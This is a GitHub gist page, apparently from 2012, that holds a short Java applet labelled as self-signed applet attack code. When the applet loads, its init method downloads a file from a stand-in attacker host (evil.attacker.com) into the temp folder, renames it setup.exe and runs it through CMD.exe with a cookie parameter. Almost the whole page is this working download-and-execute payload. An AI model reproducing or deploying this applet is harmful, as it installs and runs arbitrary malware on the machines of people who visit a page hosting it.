Skip to content

Instantly share code, notes, and snippets.

@phikshun
Created May 4, 2012 00:49
Show Gist options
  • Save phikshun/2590749 to your computer and use it in GitHub Desktop.
Save phikshun/2590749 to your computer and use it in GitHub Desktop.
Self-Signed Java Applet Attack Code
import java.io.*;
import java.net.*;
import java.applet.*;
public class Plugin extends Applet {
public void init() {
Process f;
try {
java.io.BufferedInputStream in = new java.io.BufferedInputStream(new
java.net.URL("http://evil.attacker.com/profile.png").openStream());
java.io.FileOutputStream fos = new java.io.FileOutputStream(System.getProperty("java.io.tmpdir") + File.separator + "profile.png");
java.io.BufferedOutputStream bout = new BufferedOutputStream(fos,1024);
byte[] data = new byte[1024];
int x=0;
while((x=in.read(data,0,1024))>=0) {
bout.write(data,0,x);
}
bout.close();
in.close();
File file = new File(System.getProperty("java.io.tmpdir") + File.separator + "profile.png");
File dir = new File(System.getProperty("java.io.tmpdir"));
boolean success = file.renameTo(new File(dir, "setup.exe"));
if (!success) {
// File was not successfully moved
}
String cookie = getParameter("cookie");
f = Runtime.getRuntime().exec("CMD.exe /c \"" + System.getProperty("java.io.tmpdir") + File.separator + "setup.exe -c " + cookie + "\"");
} catch(Exception e) {
e.printStackTrace();
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment